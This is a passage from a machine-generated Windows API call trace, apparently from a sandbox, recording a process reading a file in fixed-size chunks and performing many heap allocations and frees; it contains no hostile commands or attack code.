lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.699] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ffb0 [0132.700] SetFilePointer (in: hFile=0x154, lDistanceToMove=327580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ff9c [0132.700] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.700] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff9c [0132.700] SetFilePointer (in: hFile=0x154, lDistanceToMove=393096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff88 [0132.700] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.701] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff88 [0132.701] SetFilePointer (in: hFile=0x154, lDistanceToMove=458612, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff74 [0132.701] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.701] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff74 [0132.701] SetFilePointer (in: hFile=0x154, lDistanceToMove=524128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff60 [0132.701] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.702] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff60 [0132.702] SetFilePointer (in: hFile=0x154, lDistanceToMove=589644, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff4c [0132.702] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.702] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff4c [0132.702] SetFilePointer (in: hFile=0x154, lDistanceToMove=655160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff38 [0132.702] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.703] SetFilePointer (in: hFile=0x154, lDistanceToMove=685588, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7614 [0132.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x25ceba8 [0132.703] ReadFile (in: hFile=0x154, lpBuffer=0x25ceba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8af664, lpOverlapped=0x0 | out: lpBuffer=0x25ceba8*, lpNumberOfBytesRead=0x8af664*=0x1000, lpOverlapped=0x0) returned 1 [0132.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf694 | out: lpSystemTimeAsFileTime=0x8bf694*(dwLowDateTime=0x55225d0, dwHighDateTime=0x1d509d7)) [0132.703] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8614 [0132.703] SetFilePointer (in: hFile=0x154, lDistanceToMove=685608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7628 [0132.703] ReadFile (in: hFile=0x154, lpBuffer=0x25ceba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bed70, lpOverlapped=0x0 | out: lpBuffer=0x25ceba8*, lpNumberOfBytesRead=0x8bed70*=0x200, lpOverlapped=0x0) returned 1 [0132.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bed5c | out: lpSystemTimeAsFileTime=0x8bed5c*(dwLowDateTime=0x55225d0, dwHighDateTime=0x1d509d7)) [0132.704] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bed5c | out: lpSystemTimeAsFileTime=0x8bed5c*(dwLowDateTime=0x55225d0, dwHighDateTime=0x1d509d7)) [0132.704] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bed5c | out: lpSystemTimeAsFileTime=0x8bed5c*(dwLowDateTime=0x55225d0, dwHighDateTime=0x1d509d7)) [0132.704] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa7828 [0132.704] SetFilePointer (in: hFile=0x154, lDistanceToMove=685777, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa76d1 [0132.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1701f) returned 0x2400048 [0132.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4986) returned 0x2417070 [0132.705] ReadFile (in: hFile=0x154, lpBuffer=0x2417070, nNumberOfBytesToRead=0x4800, lpNumberOfBytesRead=0x8bf1d0, lpOverlapped=0x0 | out: lpBuffer=0x2417070*, lpNumberOfBytesRead=0x8bf1d0*=0x4800, lpOverlapped=0x0) returned 1 [0132.705] ReadFile (in: hFile=0x154, lpBuffer=0x25ceba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bf1c0, lpOverlapped=0x0 | out: lpBuffer=0x25ceba8*, lpNumberOfBytesRead=0x8bf1c0*=0x200, lpOverlapped=0x0) returned 1 [0132.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf1ac | out: lpSystemTimeAsFileTime=0x8bf1ac*(dwLowDateTime=0x55225d0, dwHighDateTime=0x1d509d7)) [0132.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20000) returned 0x241ba00 [0132.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x243ba08 [0132.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x244ba10 [0132.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241ba00 | out: hHeap=0x25c0000) returned 1 [0132.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x243ba08 | out: hHeap=0x25c0000) returned 1 [0132.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x244ba10 | out: hHeap=0x25c0000) returned 1 [0132.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417070 | out: hHeap=0x25c0000) returned 1 [0132.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2124) returned 0x2417070 [0132.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x25cfbb0 [0132.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfbb0 | out: hHeap=0x25c0000) returned 1 [0132.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce1a0 [0132.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfbc8 [0132.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfbe0 [0132.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfbf8 [0132.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfbc8 | out: hHeap=0x25c0000) returned 1 [0132.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x25cd8b0 [0132.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfbc8 [0132.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8c0 [0132.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfbc8 | out: hHeap=0x25c0000) returned 1 [0132.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8c0 | out: hHeap=0x25c0000) returned 1 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8b0 | out: hHeap=0x25c0000) returned 1 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfbc8 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x25cd8b0 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfc10 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8c0 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc10 | out: hHeap=0x25c0000) returned 1 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8c0 | out: hHeap=0x25c0000) returned 1 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8b0 | out: hHeap=0x25c0000) returned 1 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfc10 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x25cffb0 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24191a0 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8b0 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8b0 | out: hHeap=0x25c0000) returned 1 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cffb0 | out: hHeap=0x25c0000) returned 1 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfc28 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfc40 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x25cd8b0 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfc58 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfc70 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8c0 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8b0 | out: hHeap=0x25c0000) returned 1 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x25cffb0 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce1a0 | out: hHeap=0x25c0000) returned 1 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25ce1a0 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfc88 [0132.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc58 | out: hHeap=0x25c0000) returned 1 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfc58 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa) returned 0x25cfca0 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfcb8 [0132.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8b0 [0132.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfcb8 | out: hHeap=0x25c0000) returned 1 [0132.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8b0 | out: hHeap=0x25c0000) returned 1 [0132.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfca0 | out: hHeap=0x25c0000) returned 1 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfca0 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe) returned 0x25cfcb8 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfcd0 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8b0 [0132.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfcd0 | out: hHeap=0x25c0000) returned 1 [0132.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8b0 | out: hHeap=0x25c0000) returned 1 [0132.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfcb8 | out: hHeap=0x25c0000) returned 1 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfcb8 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x25cd8b0 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfcd0 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfce8 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8d0 [0132.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8b0 | out: hHeap=0x25c0000) returned 1 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x24191a0 [0132.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cffb0 | out: hHeap=0x25c0000) returned 1 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfd00 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfd18 [0132.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfcd0 | out: hHeap=0x25c0000) returned 1 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfcd0 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x28) returned 0x25cffb0 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfd30 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfd48 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfd60 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfd78 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfd90 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfda8 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfdc0 [0132.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfdd8 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfdf0 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfe08 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfe20 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfe38 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfbc8 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc10 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc28 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc40 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc88 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce1a0 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc58 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfca0 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfcb8 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfd18 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfd00 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfcd0 | out: hHeap=0x25c0000) returned 1 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4c) returned 0x24191e8 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419240 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419268 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8b0 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfcd0 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfd00 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2419240 | out: hHeap=0x25c0000) returned 1 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191e8 | out: hHeap=0x25c0000) returned 1 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfd18 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfcb8 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfca0 [0132.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfd18 | out: hHeap=0x25c0000) returned 1 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe) returned 0x25cfd18 [0132.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfc58 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8e0 [0132.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc58 | out: hHeap=0x25c0000) returned 1 [0132.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8e0 | out: hHeap=0x25c0000) returned 1 [0132.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfd18 | out: hHeap=0x25c0000) returned 1 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfd18 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191e8 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfc58 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419208 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8e0 [0132.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191e8 | out: hHeap=0x25c0000) returned 1 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfc88 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfc40 [0132.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc58 | out: hHeap=0x25c0000) returned 1 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfc58 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191e8 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfc28 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419230 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8f0 [0132.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191e8 | out: hHeap=0x25c0000) returned 1 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfc10 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfbc8 [0132.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfc28 | out: hHeap=0x25c0000) returned 1 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfc28 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x25cd900 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfe50 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfe68 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd910 [0132.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd900 | out: hHeap=0x25c0000) returned 1 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfe80 [0132.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cfe98 [0132.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cfe50 | out: hHeap=0x25c0000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfe50 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfeb0 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfec8 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfee0 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cfef8 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191e8 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cff10 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x2419290 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd900 [0132.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191e8 | out: hHeap=0x25c0000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cff28 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cff40 [0132.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cff10 | out: hHeap=0x25c0000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cff10 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191e8 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cff58 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24192b8 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd920 [0132.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191e8 | out: hHeap=0x25c0000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cff70 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cff88 [0132.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cff58 | out: hHeap=0x25c0000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25cff58 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6) returned 0x25cd930 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce1a0 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24192f8 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd940 [0132.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd930 | out: hHeap=0x25c0000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419310 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2419328 [0132.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce1a0 | out: hHeap=0x25c0000) returned 1 [0132.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24196e0 [0132.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25ce1a0 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419340 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419358 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419370 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2419388 [0132.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x24191a0 